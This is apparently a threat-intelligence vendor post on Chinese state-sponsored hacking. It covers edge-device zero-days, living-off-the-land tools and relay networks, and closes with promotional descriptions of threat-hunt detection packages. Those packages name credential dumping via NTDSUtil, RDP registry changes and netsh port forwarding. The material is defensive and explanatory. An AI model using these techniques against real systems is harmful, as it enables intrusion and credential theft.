China’s global ambitions continue to grow, and its military strength, technology research and economic powers are giving it an opportunity to challenge the global order of power — particularly the standing of the U.S. China is expected to soon have the military capabilities to take Taiwan by force. In April 2024, Adm. John Aquilino of the U.S. Indo-Pacific Command cautioned China will be capable of invading Taiwan by 2027. Its building of bases and airstrips on contested reefs in the Spratly Islands near the Philippines continues to cause military tensions. On the technology research side, China has invested an estimated US $15 billion — more than three times that of any other country — in quantum computing and is expected to invest as much as US $1.4 trillion in artificial intelligence (AI) in the next six years. And throughout the world, China uses its economic might — via loans and trade initiatives — to increase its influence in places such as Africa and Pacific Island nations.
Cyber capabilities play a key role in achieving China’s strategic goals, including ensuring partners stay aligned with China and shaping public narratives. This has raised alarms from other governments, which have called for increased vigilance and tightened security. The country’s offensive cyber capabilities have been used for espionage, intellectual property theft and prepositioning of footholds within the critical infrastructure of its adversaries. U.S. intelligence assesses these stealthy malware infections are intended to accomplish disruptive or destructive attacks in the event of a conflict. These campaigns have targeted government and civilian infrastructure at scale. U.S. FBI Director Christopher Wray said China “has a bigger hacking program than every other major nation combined. In fact, if each one of the FBI’s cyber agents and intelligence analysts focused exclusively on the China threat, China’s hackers would still outnumber FBI cyber personnel by at least 50 to 1.”
Espionage traditionally has been shrouded in secrecy, but this is changing. In the past 18 months, governments have disclosed suspected Chinese state-sponsored cyber activities to build public security awareness. The transparency drive correspondingly has driven a change in the advanced persistent threat (APT) landscape. As a result, Chinese state-sponsored cyber threat actors have adapted to global geopolitical developments in 2024 by updating their tactics, techniques and procedures (TTPs) and tool sets to avoid their campaigns being linked to Beijing. Threat actors with a China nexus are emphasizing stealth now more than ever by weaponizing network edge devices, using living off-the-land (LOTL) techniques and setting up operational relay box (ORB) networks.
This post is derived from Intel 471’s Cyber Geopolitical Intelligence, a service that offers insights and analysis of political activity and significant regional events, including China, Iran and Russia, and how those events impact the cyber threat landscape. This post will discuss some of the state sponsored campaigns linked to China and what techniques will likely continue to trend. For more information, please contact Intel 471.
Zero-Day Exploits
Chinese APT groups will move away from traditional initial access methods such as social engineering to exploit zero-day vulnerabilities against network edge devices for mass exploitation. Edge devices and services such as firewalls and virtual private network (VPN) gateways increasingly have become popular targets. These devices are internet facing and provide critical services to remote users, but they also are not easily monitored by network administrators due to the lack of endpoint detection and response (EDR) solutions installed. This provides a “rapid route to privileged local or network credentials on a server with broad access to the internal network” of a target organization, according to research from WithSecure.
Edge-related common vulnerabilities and exposures (CVEs) added to the Known Exploited Vulnerabilities catalog of the U.S. Cybersecurity and Infrastructure Security Agency (CISA) increased from two per month in 2022 to 4.75 in 2024. Conversely, non-edge entries dropped from 5.36 in 2023 to three in 2024. Additionally, an estimated 85% of known zero-days exploited by Chinese nation-state groups since 2021 were against public-facing appliances, which supports a growing trend that attackers are singling out edge devices for mass exploitation.
The Chinese threat group Volt Typhoon aka Vanguard Panda, Bronze Silhouette, Dev-0391, UNC3236, Voltzite, Insidious Taurus discovered in mid-2021 often relies on exploiting zero-day vulnerabilities. The group targets critical infrastructure, such as communications, energy, transport and utilities, including water and wastewater facilities. The group’s “choice of targets and pattern of behavior is not consistent with traditional cyber espionage or intelligence-gathering activities,” according to a U.S. advisory. Volt Typhoon targets public-facing appliances — routers, VPNs and firewalls — in campaigns the U.S. assesses with high confidence are intended to preposition themselves on devices to disrupt them if needed. The U.S. government announced in January 2024 it had disrupted a botnet assembled by Volt Typhoon and used to attack critical infrastructure. The botnet was assembled using the KV malware, which infected hundreds of small office-home office routers (SOHO) — most of which were out of support and no longer receiving security updates.
Several of the largest cyberattacks in 2023 related to vulnerabilities in edge devices or enterprise appliances. On May 23, 2023, Barracuda disclosed CVE-2023-2868, a zero-day vulnerability in its Email Security Gateway (ESG). As early as Oct. 10, 2022, a threat actor group sent emails to potential victims with malicious files intended to exploit ESG. Mandiant identified the group as UNC4841, a cyber espionage group that acts in support of China.
In early 2021, a group known as Silk Typhoon (under Microsoft’s current threat actor naming scheme) exploited a series of zero-day vulnerabilities, including CVE-2021-26855 in the on-premises version of Microsoft’s Exchange email server. The attack could be launched remotely against an Exchange server on port 443. Tens of thousands of Exchange servers were exploited using the vulnerabilities — collectively known as the ProxyLogon flaws — in the days before Microsoft deployed patches.
How does China source these zero-day vulnerabilities? Increasingly, domestically. Chinese security researchers are talented and prolific. Chinese teams in the 2010s saw success at international Capture the Flag and hacking competitions such as DEF CON and Pwn2Own. But in 2017, Beijing started to pressure private sector security researchers to prevent them from sharing knowledge at overseas cybersecurity events. Authoritative Chinese information security experts also asserted that knowledge of undisclosed software vulnerabilities “should remain in China.” In the ensuing years, the Chinese Communist Party (CCP) incorporated the use of security flaws into its national military-civil fusion strategy that aims to acquire foreign intellectual property, key research and high-value information.
China now uses bug-bounty programs, hacking competitions, universities and private entities to collect information on zero-day vulnerabilities in popular software and products. By mandating that security researchers disclose zero-day vulnerabilities to state authorities first, Beijing provides an operational window for nation-state cyber perpetrators to exploit these vulnerabilities for cyber espionage and intelligence gathering. One example of this arrangement played out in 2022. Microsoft reported an Exchange vulnerability tracked as CVE-2021-42321 that was exploited in the wild three days after the security flaw was revealed at the Tianfu Cup, an annual hacking competition held in Chengdu, Sichuan.
Living Off the Land
Rather than develop highly sophisticated custom malware, nation-state groups increasingly will use LOTL techniques to maintain persistence and undetected access on information technology (IT) networks. LOTL techniques use legitimate tools, features and functions available in a target environment to traverse networks and hide within normal network activity, reducing the likelihood of the attacker’s presence being flagged as suspicious. In 2023, the Chinese APT groups Flax Typhoon aka RedJuliett, Ethereal Panda and Volt Typhoon leveraged legitimate tools and utilities that were built into the Windows operating system to target key sectors in the U.S., Taiwan and elsewhere. Some of the tools they used included wmic, ntdsutil, netsh and PowerShell.
In August 2023, the China-linked cyber espionage group BlackTech used LOTL techniques such as NetCat shells and modifying the victim registry to enable remote desktop protocol (RDP). In July 2024, the Chinese-speaking APT group Ghost Emperor resurfaced after an extended period of inactivity with new obfuscation techniques, including the use of living-off-the-land binaries (LOLBins) such as reg.exe and expand.exe within the batch file that initiated the infection chain on the compromised machine to achieve stealth.
Compromised Infrastructure
Chinese ORB networks will continue to develop and mature at pace, reducing APT groups’ dependency on conventional actor-controlled infrastructure. ORB networks are global infrastructures of virtual private servers (VPSs) and compromised smart devices and routers. The extensive networks of proxy devices allow their administrators to scale up and create a “constantly evolving mesh network” to conceal espionage operations. While ORB networks have existed for years, Chinese ORBs in particular have increased in popularity and sophistication in recent years. Each of China’s ORBs is maintained by either private companies or state-sponsored entities and facilitates multiple threat clusters at any given time.
The Mulberry Typhoon aka APT5, Bronze Fleetwood, Keyhole Panda, Manganese, Poisoned Flight, TABCTENG, TEMP.Bottle and Nylon Typhoon aka ke3chang, APT15, Vixen Panda, Nickel groups used the SPACEHOP network to conduct network reconnaissance scanning and exploit vulnerabilities. The Violet Typhoon aka APT31 group and several other actors with a China nexus used the FLORAHOX ORB network to proxy traffic from a source and relay it through a Tor network and numerous compromised router nodes to obfuscate the source of the traffic for cyber espionage attacks.
Assessment
Global geopolitical developments will continue to heavily influence the Chinese APT threat landscape in terms of targeting, tool sets and TTPs. The acceleration of improvements in the cybersecurity posture of numerous key targeted countries has compelled Chinese state-sponsored intelligence forces to become more innovative with their attack strategies.
The use of ORB networks and exploitation of network edge devices emphasize the scalability of their attacks, and all three techniques focus on secrecy. Adopting these techniques would have required a cumulation of upgraded skills, malware and tools that could only be achieved by continuous reconnaissance of target networks and technologies as well as meticulous testing of tools against them over extended periods. Therefore, these changes highly likely reflect a considered, fundamental and permanent shift in Chinese nation-state cyber operations.
In the next six to 12 months, governments and industry regulators worldwide will increase oversight of vital sectors such as energy, public administration, military and defense, technology, manufacturing, telecommunications and media, health care and financial services. Not only will Chinese nation-state threat actors almost certainly continue to pursue these high-value targets, it also is probable they will scale up their operations to conduct global campaigns and target as many entities in each region or sector as possible to maximize their gains at every exploitation.
Hunt Packages
Intel 471 provides threat hunting capabilities for Chinese APT activity through our threat hunting platform HUNTER471. The following is a non-exhaustive list of hunt packages we have created related to the tactics used by Chinese nation-state threat actors.
These pre-written threat hunt queries can be used to query logs stored in security information and event management (SIEM) or EDR systems to detect potential malicious activity. The queries are compatible with a variety of security tools and products, such as CarbonBlack Cloud - Investigate, CarbonBlack Response, CrowdStrike, CrowdStrike LogScale, Elastic, Microsoft Defender, Microsoft Sentinel, Palo Alto Cortex XDR, QRadar Query, SentinelOne, Splunk and Trend Micro Vision One. Register for the Community Edition of HUNTER471, which contains sample hunt packages at no cost.
WMIC Windows Internal Discovery and Enumeration
This package will identify the potential malicious use of Windows Management Interface (WMI) for local enumeration and discovery of a host.
Obfuscated PowerShell Execution String - Potential Malware Execution
Many adversaries use obfuscated commands involving different techniques to implement and use Base64 strings. This package identifies popular characteristics deployed by many actors utilizing this technique.
Enabling Remote Desktop Protocol (RDP) - Possible SmokedHam Activity (Commandline Arguments)
This content is designed to detect when command-line arguments are executed to modify the registry key that enables or disables RDP capabilities (HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server OR HKLM\SYSTEM\ControlSet00*\Control\Terminal Server). False positives may occur depending on the environment per company, as these registry keys can be modified by admins.
Dump Active Directory Database with NTDSUtil - Potential Credential Dumping
This content is designed to identify when NTDSutil.exe is used to create a full backup of Active Directory.
Netsh Port Forwarding Command
This use case is meant to identify the netsh port forwarding command-line parameters "interface portproxy add."
Restricted Admin Mode Login - Possible Lateral Movement
This hunt package is meant to capture the surrounding activity when a user successfully logs in (Event Code 4624) using RDP with restricted admin mode enabled.
